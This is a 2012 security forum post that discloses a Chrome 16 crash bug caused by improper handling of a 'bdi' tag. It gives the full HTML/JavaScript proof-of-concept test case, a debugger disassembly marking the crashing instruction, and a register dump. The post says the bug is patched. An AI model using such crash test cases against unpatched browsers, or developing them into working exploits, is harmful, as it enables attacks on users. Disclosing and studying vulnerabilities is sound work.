+ Reply to Thread
Results 1 to 1 of 1
Like Tree4Likes
  • 4 Post By "vinnu"

Thread: Chrome "16.0.912.77 m" crash Share/Save - My123World.Com!

  1. #1
    Security Researcher "vinnu" will become famous soon enough"vinnu" will become famous soon enough "vinnu"'s Avatar
    Join Date
    Jul 2010
    Posts
    207
    Blog Entries
    2
    Thanks
    142
    Thanked 116 Times in 63 Posts

    Chrome "16.0.912.77 m" crash



    Patched in Chrome 17.0.963.46 m. Independently discovered by a fuzzer written by me, but alas google team quickly patched the bug.
    The bug was in improper processing of the child "bdi" tag.

    Team : Legion Of Xtremers
    Special Thanx To : Secfence

    Code:
    <html>
    <head><title>
    Chrome "16.0.912.77 m" crash
    </title></head>
    <body>
    <script>
    var alfa = document.createElement("a");
    alfa.code=unescape("% u 4141% u 4141");
    
    var beta = null;
    var gamma = null;
    beta = document.body.appendChild(alfa);
    beta.outerHTML+=alfa.code;
    //	beta.innerHTML+=alfa.code;
    	
    	gamma = document.createElement("bdi");
    beta.t1 = document.body.appendChild(gamma);
    
    </script>
    
    </body>
    </html>
    Code:
    6A9C03D3   EB 11            JMP SHORT chrome_1.6A9C03E6
    6A9C03D5   8B49 10          MOV ECX,DWORD PTR DS:[ECX+10]
    6A9C03D8   3951 10          CMP DWORD PTR DS:[ECX+10],EDX
    6A9C03DB  ^75 F8            JNZ SHORT chrome_1.6A9C03D5
    6A9C03DD   8BBD 74FFFFFF    MOV EDI,DWORD PTR SS:[EBP-8C]
    6A9C03E3   8979 10          MOV DWORD PTR DS:[ECX+10],EDI
    6A9C03E6   8B4A 10          MOV ECX,DWORD PTR DS:[EDX+10]
    6A9C03E9   8BBD 78FFFFFF    MOV EDI,DWORD PTR SS:[EBP-88]
    6A9C03EF   894F 10          MOV DWORD PTR DS:[EDI+10],ECX // Crash occurs here
    6A9C03F2   3950 04          CMP DWORD PTR DS:[EAX+4],EDX
    6A9C03F5   75 09            JNZ SHORT chrome_1.6A9C0400
    6A9C03F7   8B8D 78FFFFFF    MOV ECX,DWORD PTR SS:[EBP-88]
    6A9C03FD   8948 04          MOV DWORD PTR DS:[EAX+4],ECX
    6A9C0400   3950 08          CMP DWORD PTR DS:[EAX+8],EDX
    6A9C0403   75 09            JNZ SHORT chrome_1.6A9C040E
    6A9C0405   8B8D 7CFFFFFF    MOV ECX,DWORD PTR SS:[EBP-84]
    6A9C040B   8948 08          MOV DWORD PTR DS:[EAX+8],ECX
    6A9C040E   8B4D 80          MOV ECX,DWORD PTR SS:[EBP-80]
    Code:
    EAX 0034ECE8
    ECX 0432DA9C
    EDX 0432DABC
    EBX 0034ED14
    ESP 0034E9F0
    EBP 0034EB34
    ESI 00000000
    EDI 00000000
    EIP 6A9C03EF chrome_1.6A9C03EF
    Last edited by "vinnu"; 02-14-2012 at 11:30 AM.

  2. The Following 2 Users Say Thank You to "vinnu" For This Useful Post:

    b0nd (02-14-2012), [s] (02-15-2012)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts